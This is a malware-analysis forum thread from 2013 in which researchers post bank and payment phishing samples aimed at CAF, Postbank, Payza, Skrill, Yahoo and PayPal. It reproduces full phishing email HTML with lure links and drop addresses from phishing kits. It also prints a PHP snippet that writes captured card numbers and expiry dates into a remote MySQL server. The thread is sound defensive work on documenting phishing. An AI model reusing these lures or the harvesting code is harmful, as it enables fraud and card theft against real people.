A forum for reverse engineering, OS internals and malware analysis 

Phish-BankFraud

Forum for analysis and discussion about malware.

Re: Phish-BankFraud

 #19940  by Xylitol
 Thu Jul 04, 2013 9:39 am
Received this morning.
https://www.phishtank.com/phish_detail. ... id=1918818
https://www.phishtank.com/phish_detail. ... id=1918826
Code: Select all
x-store-info:8Rlnjmxvy6L6cXs23gz/9HW3P3dIQ3IM6IQxAzzR5HKM9ey9SkAB0zKAwdCSsiZDOMZKhPtQaQovUaElQov7pYd7qzZJ3BReMhc4rWGrLh+gTxWH/sS9o06nX5PyXsyw3A/vdhnP5Jg=
Authentication-Results: hotmail.com; spf=none (sender IP is 178.32.228.28) smtp.mailfrom=adambpww@ds5637.dreamservers.com; dkim=none header.d=credit-carte.fr; x-hmca=none header.id=service@credit-carte.fr
X-SID-PRA: service@credit-carte.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0yO1NDTD0w
X-Message-Info: rLItp1kDnk7oGAKcOgu6Oi6jsHwQ2WeImPvyBwthippkcj7ZoSELxAHk6o1Lxo+Fzo5O4/OPkNba7ZDtNUyH93QnUHrJLbQaW0Y4FrvfpYi0/EUV9QUekxpQDa9Mtle8yrh+EdI+frDsQGk5cpLBc73iE93ONdSP0jil9fIOQeA=
Received: from mo28.mail-out.ovh.net ([178.32.228.28]) by COL0-MC2-F18.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Wed, 3 Jul 2013 19:17:23 -0700
Received: from redirect.ovh.net (b3.ovh.net [213.186.33.53])
	by mo28.mail-out.ovh.net (Postfix) with SMTP id BDFE6FF887C
	for <*****@live.fr>; Thu,  4 Jul 2013 04:17:22 +0200 (CEST)
Received: from redirect.ovh.net (HELO queue) ()
	by redirect.ovh.net with SMTP; 4 Jul 2013 02:23:26 -0000
Received: from ds5637.dreamservers.com (67.205.22.155)
  by redirect.ovh.net with SMTP; 4 Jul 2013 02:23:26 -0000
Received: by ORT (Ovh Redirect Technology) ver:1.0
		< adambpww@ds5637.dreamservers.com
		> l5gqp8qfqmotd569k6d9@k.o-w-o.info >> *****@live.fr (found)
Received: by ds5637.dreamservers.com (Postfix, from userid 12985212)
	id 6A41C5C21E; Wed,  3 Jul 2013 19:15:12 -0700 (PDT)
To: l5gqp8qfqmotd569k6d9@k.o-w-o.info
Subject: Votre caisse d'allocation familiales
From: Caf.fr <service@credit-carte.fr>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="8ff7df6f4a3cae7ad8bb7ec0f49fa2e5"
Message-Id: <20130704021513.6A41C5C21E@ds5637.dreamservers.com>
Date: Wed,  3 Jul 2013 19:15:12 -0700 (PDT)
X-Ovh-Tracer-Id: 15897143735697427842
X-VR-SPAMSTATE: OK
X-VR-SPAMSCORE: 10
X-VR-SPAMCAUSE: gggruggvucftvghtrhhoucdtuddrfeeijedrtdduucetufdoteggodetrfcurfhrohhfihhlvgemucfqggfjnecuuegrihhlohhuthemuceftddtnecuogfpohfkffculddutddm
Return-Path: adambpww@ds5637.dreamservers.com
X-OriginalArrivalTime: 04 Jul 2013 02:17:23.0976 (UTC) FILETIME=[9EF8E880:01CE785C]

This is a multi-part message in MIME format.
--8ff7df6f4a3cae7ad8bb7ec0f49fa2e5
Content-type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 7bit

<HEAD>
<META content="MSHTML 6.00.6000.16640" name=GENERATOR></HEAD>
<BODY>
<DIV class=ReadMsgBody id=mpf0_readMsgBodyContainer onclick="return Control.invoke('MessagePartBody','_onBodyClick',event,event);">
<DIV class="SandboxScopeClass ExternalClass" id=mpf0_MsgContainer>
<TABLE style="WORD-SPACING: 0px; FONT: 13px/17px Tahoma, Verdana, Arial, sans-serif; TEXT-TRANSFORM: none; COLOR: rgb(42,42,42); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); WIDOWS: 2; ORPHANS: 2" cellSpacing=0 cellPadding=0 width=578 align=center border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" align=middle width=578 height=30><FONT style="FONT-SIZE: 9px; LINE-HEIGHT: normal" face="Arial, sans-serif" color=#000000 size=1></FONT></TD></TR></TBODY></TABLE>
<TABLE style="BORDER-RIGHT: rgb(0,80,177) 1px solid; BORDER-TOP: rgb(0,80,177) 1px solid; WORD-SPACING: 0px; FONT: 13px/17px Tahoma, Verdana, Arial, sans-serif; TEXT-TRANSFORM: none; BORDER-LEFT: rgb(0,80,177) 1px solid; COLOR: rgb(42,42,42); TEXT-INDENT: 0px; BORDER-BOTTOM: rgb(0,80,177) 1px solid; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); WIDOWS: 2; ORPHANS: 2" cellSpacing=0 cellPadding=0 width=580 align=center border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" vAlign=top width=133 bgColor=#ffffff>
<TABLE style="LINE-HEIGHT: 17px" cellSpacing=0 cellPadding=0 width=133 border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" vAlign=top width=26> </TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=79><IMG alt="ALLOCATIONS FAMILIALES" hspace=0 src="http://www.oldoaksjournal.com/ImageProxyy.PNG" border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=28> </TD></TR></TBODY></TABLE></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=445>
<TABLE style="LINE-HEIGHT: 17px" cellSpacing=0 cellPadding=0 width=445 border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px" bgColor=#0050b1>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=50 height=80> </TD>
<TD style="LINE-HEIGHT: 17px" colSpan=2 height=80><FONT style="FONT-SIZE: 22px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#ffffff size=4>Votre Caf vous informe sur :<SPAN class=ecxApple-converted-space> </SPAN><BR style="LINE-HEIGHT: 28px">vos </FONT><FONT style="FONT-SIZE: 22px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#ffffff size=4>remboursements</FONT></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=10 height=80> </TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#0050b1>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=50 border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=317 border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=68><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=68 border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG style="LINE-HEIGHT: 17px" height=1 src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fwebe.emv3.com%2fcnaf_%2f20120822%2fDTR-RSA-Relance-ECARRT2%2fimages%2fspacer.gif" width=10 border=0></TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#ffffff>
<TD style="LINE-HEIGHT: 17px" vAlign=top><IMG alt="" hspace=0 src="http://www.oldoaksjournal.com/ImageProxyn.PNG" border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=317 height=49> </TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top colSpan=2><IMG alt=caf.fr hspace=0 src="http://www.oldoaksjournal.com/ImageProxyt.PNG" border=0></TD></TR></TBODY></TABLE></TD></TR>
<TR style="LINE-HEIGHT: 17px">
<TD style="LINE-HEIGHT: 17px" vAlign=top bgColor=#0050b1><IMG alt="" hspace=0 src="http://www.oldoaksjournal.com/ImageProxy.PNG" border=0></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top>
<TABLE style="LINE-HEIGHT: 17px" cellSpacing=0 cellPadding=0 width=445 border=0>
<TBODY style="LINE-HEIGHT: 17px">
<TR style="LINE-HEIGHT: 17px" bgColor=#ffffff>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=44 height=415> </TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=393 height=415><FONT style="FONT-SIZE: 12px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#323232 size=1><BR style="LINE-HEIGHT: 15px"></FONT><FONT style="FONT-WEIGHT: bold; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#323232><SPAN>Madame, Monsieur, <BR style="LINE-HEIGHT: 15px"></SPAN></FONT><FONT style="FONT-SIZE: 12px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#323232 size=1><BR style="LINE-HEIGHT: 15px"></FONT>Après les derniers calculs annuels de l'exercice de votre activité, 
<P style="FONT-WEIGHT: normal; MARGIN: 10px 0px 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); TEXT-INDENT: 0px; LINE-HEIGHT: 200%; FONT-STYLE: normal; FONT-FAMILY: Times New Roman; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-ALIGN: left; FONT-VARIANT: normal; WIDOWS: 2; ORPHANS: 2">nous avons déterminé que vous êtes admissible a recevoir un remboursement de notre part d'un montant de 217,50 €</P>
<P style="FONT-WEIGHT: normal; MARGIN: 10px 0px 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); TEXT-INDENT: 0px; LINE-HEIGHT: 200%; FONT-STYLE: normal; FONT-FAMILY: Times New Roman; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-ALIGN: left; FONT-VARIANT: normal; WIDOWS: 2; ORPHANS: 2">Prière de soumettre votre demande de remboursement et nous permettre de 2 jours ouvrables pour le traitement de votre situation,</P>
<P style="FONT-WEIGHT: normal; MARGIN: 10px 0px 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); TEXT-INDENT: 0px; LINE-HEIGHT: 200%; FONT-STYLE: normal; FONT-FAMILY: Times New Roman; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-ALIGN: left; FONT-VARIANT: normal; WIDOWS: 2; ORPHANS: 2">Pour accéder au formulaire de votre Compte , <A href="
http://klassofficeangels.co.uk/wp-admin/images/caf.fr/Caisse-allocations-familiales/" target=_blank><FONT color=#808000>Veuillez cliquez ici</FONT></A></P>
<P style="TEXT-ALIGN: left">A bientôt  sur Caf.fr </P>
<P style="TEXT-ALIGN: left">Votre caisse d'allocation familiales </P>
<P> </P></TD>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=8 height=415> </TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#ffffff>
<TD style="LINE-HEIGHT: 17px" vAlign=top width=8> </TD></TR></TBODY></TABLE></TD></TR>
<TR style="LINE-HEIGHT: 17px" bgColor=#0050b1>
<TD style="LINE-HEIGHT: 17px" align=middle colSpan=2 height=90><FONT style="FONT-SIZE: 11px; LINE-HEIGHT: normal" face="Arial, Helvetica, sans-serif" color=#ffffff size=4><FONT style="FONT-WEIGHT: 700; LINE-HEIGHT: normal; TEXT-DECORATION: underline" color=#ffffff>Mentions légales</FONT><BR style="LINE-HEIGHT: 14px"><BR style="LINE-HEIGHT: 14px">Vous recevez ce message car vous nous avez communiqué votre adresse électronique..<SPAN class=ecxApple-converted-space> </SPAN><BR style="LINE-HEIGHT: 14px">Si vous ne souhaitez plus recevoir de courriel de votre Caf, veuillez effacer votre adresse e-mail<SPAN class=ecxApple-converted-space> </SPAN><BR style="LINE-HEIGHT: 14px">dans l'espace "Mon Compte" du site<SPAN class=ecxApple-converted-space> </SPAN><A title=www.caf.fr style="CURSOR: pointer; COLOR: rgb(255,255,255); LINE-HEIGHT: 14px; TEXT-DECORATION: underline" href="http://courriel.caf.fr/HS?a=ENX7CqqdlqtK8SA9MKJVCxLnGHxKLrfxUPcStGb5lw8W0bBhOG5mpqVsje_Hhe-uL1IR" target=_blank
 ><FONT style="LINE-HEIGHT: normal" color=#ffffff>www.caf.fr</FONT></A></FONT></TD></TR></TBODY></TABLE><IMG style="WORD-SPACING: 0px; FONT: 13px/17px Tahoma, Verdana, Arial, sans-serif; TEXT-TRANSFORM: none; COLOR: rgb(42,42,42); TEXT-INDENT: 0px; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); WIDOWS: 2; ORPHANS: 2" height=1 alt="" src="https://bay169.mail.live.com/Handlers/ImageProxy.mvc?bicild=&canary=qHLfzMG4u5yGnRcCIfKGE2YjbBwsrbAy5xl4a31nbjI%3d0&url=http%3a%2f%2fcourriel.caf.fr%2fHO%3fDdX7CqqdlqtK8SA9MOPQKPbnGHxKLIcjIgjtS5kGfgDiKKY.gif" width=1 border=0> </DIV></DIV></BODY>
Code: Select all
$headers = "From: ReZzZulT caf <thomasjulien10@googlemail.com>";
Code: Select all
$send = "thomasjulien10@googlemail.com";
Attachments
infected
(561.18 KiB) Downloaded 56 times

Re: Phish-BankFraud

 #20657  by Xylitol
 Fri Aug 30, 2013 10:42 pm
Postbank phishing, thanks to markusg for the link.
http://www.phishtank.com/phish_detail.p ... id=2000306
Fun, they use urlrewrite:
Code: Select all
RewriteEngine On

RewriteRule ^([A-Za-z0-9-]+).postbank.de/rai/login$ ./p.html [L,QSA]
Attachments
infected
(8.76 KiB) Downloaded 54 times

Re: Phish-BankFraud

 #20689  by Xylitol
 Mon Sep 02, 2013 12:46 pm
Payza phishing
https://www.phishtank.com/phish_detail. ... id=2008243
Code: Select all
x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 72.20.57.159) smtp.mailfrom=stabletr@server.stabletreasure.com; dkim=none header.d=payza.com; x-hmca=none header.id=noreply@payza.com
X-SID-PRA: noreply@payza.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: s1:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTkSkfQf0VM3EjGNlYZMOiUHTp8SGYn1b7ZZ4Laa+ZyyskqPPuyzpXoWhBOaRQyEr49tG2ATE4erdx0lpt8h5FV3PbCAEfANqq69iCxXZL6ylgOCcCDq23caW2SLNLcHxzBxOg1Hmfy1l7++7gnt/mzDJGUrpL5poVDMK0EWKO0TBs2sEhDfw5CyFfx8B0bENEmeYEl55raGwp7CW7tAqGvx
Received: from server.stabletreasure.com ([72.20.57.159]) by COL0-MC3-F7.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Mon, 2 Sep 2013 04:11:02 -0700
Received: from stabletr by server.stabletreasure.com with local (Exim 4.80.1)
	(envelope-from <stabletr@server.stabletreasure.com>)
	id 1VGS29-0003lT-IL
	for ****************@live.fr; Mon, 02 Sep 2013 04:11:01 -0700
To: ****************@live.fr
Subject: Payza: Money Received
X-PHP-Script: stabletreasure.com/perfect.php for 198.7.58.98
From: Payza <noreply@payza.com>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <E1VGS29-0003lT-IL@server.stabletreasure.com>
Date: Mon, 02 Sep 2013 04:11:01 -0700
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.stabletreasure.com
X-AntiAbuse: Original Domain - live.fr
X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]
X-AntiAbuse: Sender Address Domain - server.stabletreasure.com
X-Get-Message-Sender-Via: server.stabletreasure.com: authenticated_id: stabletr/only user confirmed/virtual account not confirmed
Return-Path: stabletr@server.stabletreasure.com
X-OriginalArrivalTime: 02 Sep 2013 11:11:02.0762 (UTC) FILETIME=[1C70ECA0:01CEA7CD]

<html><head xmlns="http://www.w3.org/1999/xhtml"><meta http-equiv="X-UA-Compatible" content="IE=7"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link type="text/css" rel="stylesheet" href="http://199.116.250.88:2095/cpsess555206985/3rdparty/roundcube/program/js/tiny_mce/themes/advanced/skins/default/content.css"><link type="text/css" rel="stylesheet" href="http://199.116.250.88:2095/cpsess555206985/3rdparty/roundcube/skins/classic/editor_content.css"></head><body style="font-family: Verdana,Geneva,sans-serif;" dir="ltr" id="tinymce" class="mceContentBody " onload="window.parent.tinyMCE.get('compose-body').onLoad.dispatch();" contenteditable="true"><p id="yui_3_7_2_35_1374163412280_54"> </p><div id="yui_3_7_2_35_1374163412280_59" class="yui_3_7_2_35_1374163412280_58" style="font-family: times new roman, new york, times, serif; font-size: 12pt;" data-mce-style="font-family: times new roman, new york, times, serif; font-size: 12pt;"><div id="yui_3_7_2_35_1374163412280_88" class="yui_3_7_2_35_1374163412280_66" style="font-family: times new roman, new york, times, serif; font-size: 12pt;" data-mce-style="font-family: times new roman, new york, times, serif; font-size: 12pt;"><div id="yui_3_7_2_35_1374163412280_249" class="y_msg_container"><br><div id="yiv9698155111"><table class="mceItemTable" id="yui_3_7_2_35_1374163412280_248" style="width: 606px; height: 614px;" data-mce-style="width: 606px; height: 614px;" align="center" border="0" cellpadding="0" cellspacing="0"><tbody id="yui_3_7_2_35_1374163412280_247"><tr id="yui_3_7_2_35_1374163412280_246"><td id="yui_3_7_2_35_1374163412280_245" valign="bottom"><span class="yui_3_7_2_35_1374163412280_72" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #9f9f9f;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #9f9f9f;"> This is an automated email, please do not reply</span></td><td align="right"><img src="http://www.m5zn.com/image.php?img=14896452.png" alt="" data-mce-src="http://www.m5zn.com/image.php?img=14896452.png" border="0" height="52" width="182"></td></tr><tr><td colspan="2" height="14" valign="bottom"><img src="http://intradenetwork.com/components/com_banners/url.htm" alt="" data-mce-src="http://intradenetwork.com/components/com_banners/url.htm" height="3" width="100%"></td></tr><tr id="yui_3_7_2_35_1374163412280_264"><td id="yui_3_7_2_35_1374163412280_263" colspan="2"><h1 id="yui_3_7_2_35_1374163412280_262" class="yui_3_7_2_35_1374163412280_73" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; font-weight: normal; font-size: 24px; padding: 10px 0px 0px 0px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; font-weight: normal; font-size: 24px; padding: 10px 0px 0px 0px;">Your Account Limited Please Verify Your Identity</h1><p id="yui_3_7_2_35_1374163412280_270" class="yui_3_7_2_35_1374163412280_62" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #7ebd41; font-weight: normal; font-size: 19px; padding: 0px 0px 0px 0px; line-height: 24px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #7ebd41; font-weight: normal; font-size: 19px; padding: 0px 0px 0px 0px; line-height: 24px;">You've got cash! But Need Update Your Info To Accept Payment</p><h2 class="yui_3_7_2_35_1374163412280_74" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #f79422; font-size: 19px; border-top: 1px solid #efefef; padding: 10px 0px 0px 0px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #f79422; font-size: 19px; border-top: 1px solid #efefef; padding: 10px 0px 0px 0px;">Payment Details</h2><ul id="yui_3_7_2_35_1374163412280_85" class="yui_3_7_2_35_1374163412280_76" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454; list-style-type: none;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454; list-style-type: none;"><li>Date: July 18, 2013 7:44:01 AM</li><li id="yui_3_7_2_35_1374163412280_273">Amount Received $250.00 USD</li><li id="yui_3_7_2_35_1374163412280_275">Reference Number: 4D019-1880F-E5509</li><li></li><li>Note : You Account Limited And Money Not Add</li><li><strong><a href="http://dineinhell.com/1" data-mce-href="http://dineinhell.com/1">Verify Your Identity By Clicking On This Link or By Click The One Below</a></strong></li><li>Or Click In Next URL</li><li><strong> <a href="http://dineinhell.com/1" target="_blank" data-mce-href="http://dineinhell.com/1">https://secure.payza.com/P.aspx?c=X18O74LDCBX7</a></strong><br data-mce-bogus="1"></li><li>2. Verify Your Identity  . Will Update Your Account And Add The Hold Money</li></ul><p class="yui_3_7_2_35_1374163412280_63" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 21px; color: #545454;">View the details of this transaction by logging into your Payza account.</p></td></tr><tr><td colspan="2"><div style="float: right; width: 123px; min-height: 20px;" data-mce-style="float: right; width: 123px; min-height: 20px;"><div style="float: right;" data-mce-style="float: right;"><span class="yui_3_7_2_35_1374163412280_79" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #36c; font-size: 15px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #36c; font-size: 15px;"> Follow Us </span> <img src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_ac58ec5c13682fe.png" alt="on our Blog" data-mce-src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_ac58ec5c13682fe.png" border="0" height="16" width="16"> <img src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_1a07df47ee559fa.png" alt="on Facebook" data-mce-src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_1a07df47ee559fa.png" border="0" height="16" width="16"> <img src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_30215a28449bab8.png" alt="on Twitter" data-mce-src="http://www.m5zn.com/newuploads/2013/09/02/png//m5zn_30215a28449bab8.png" border="0" height="16" width="16"></div></div><span class="yui_3_7_2_35_1374163412280_80" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 17px; color: #66aa1e;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 17px; color: #66aa1e;"> Thanks for choosing Payza, </span><br> <span class="yui_3_7_2_35_1374163412280_81" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; font-size: 15px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; color: #66aa1e; font-size: 15px;"> The Payza Team</span></td></tr><tr><td colspan="2" height="14" valign="bottom"><img src="http://intradenetwork.com/components/com_banners/url.htm" alt="" data-mce-src="http://intradenetwork.com/components/com_banners/url.htm" height="3" width="100%"></td></tr><tr><td colspan="2"><p class="yui_3_7_2_35_1374163412280_64" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #545454; padding: 10px 0px 0px 0px;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 12px; color: #545454; padding: 10px 0px 0px 0px;"><span class="yui_3_7_2_35_1374163412280_82" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 14px; font-weight: bold;"> Need Assistance?</span><br> We're happy to help by phone Monday to Friday 8:00 a.m. to 11:59 p.m. EST, or by email<br> Copyright 2013 Payza. All rights reserved.</p><p class="yui_3_7_2_35_1374163412280_65" style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 11px; color: #66aa1e;" data-mce-style="font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 11px; color: #66aa1e;">Email ID: 0049</p></td></tr></tbody></table></div></div></div></div></body></html>
Code: Select all
$send ="willskathlin1@gmail.com,piyushpatdiya1@gmail.com"; # [Your Email Here] 
mailers:
Code: Select all
stabletreasure.com/mail.php
stabletreasure.com/perfect.php
yourownprogrammer.com/mizos-mailer3.php
yourownprogrammer.com/ok.php
Skrill:
http://www.phishtank.com/phish_detail.p ... id=2008286
Code: Select all
$send ="forexbank459@gmail.com,securty_y@yahoo.com"; # [Your Email Here] 
yahoo:
Code: Select all
$recipient = "thereviewcomittee2010@gmail.com";
Attachments
infected
(1.03 MiB) Downloaded 65 times
infected
(1.7 MiB) Downloaded 63 times

Re: Phish-BankFraud

 #20790  by Blaze
 Thu Sep 12, 2013 1:07 pm
SNS bank & ICS (Visa/Mastercard) phishing.
Code: Select all
http://216.59.22.125/~best/
http://216.59.22.184/~best/
http://67.23.163.29/~komer/
Attachments
(169.57 KiB) Downloaded 62 times

Re: Phish-BankFraud

 #21693  by Xylitol
 Sun Dec 15, 2013 7:10 pm
German paypal
https://www.phishtank.com/phish_detail. ... id=2172040
Code: Select all
    $string = base64_decode($_POST['secure'])."|".$_POST['ccnr']."|".$_POST['kpn']."|".$_POST['gulm']."/".$_POST['guly']."|".$_POST['ktn']."|".$_POST['limit'];
     mysql_connect("192.154.110.252", "0x82x91x32x23x29", "0x82x91x32x23x29");
        mysql_select_db("0x82x91x32x23x29");
        $url = mysql_real_escape_string($_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING']);
        $query = "INSERT INTO log (content,date,url) VALUES ('".mysql_real_escape_string($string)."',NOW(),'".$url."')";
        mysql_query($query);
        $step = 3; 
Attachments
infected
(457.66 KiB) Downloaded 65 times
 Return to “Malware”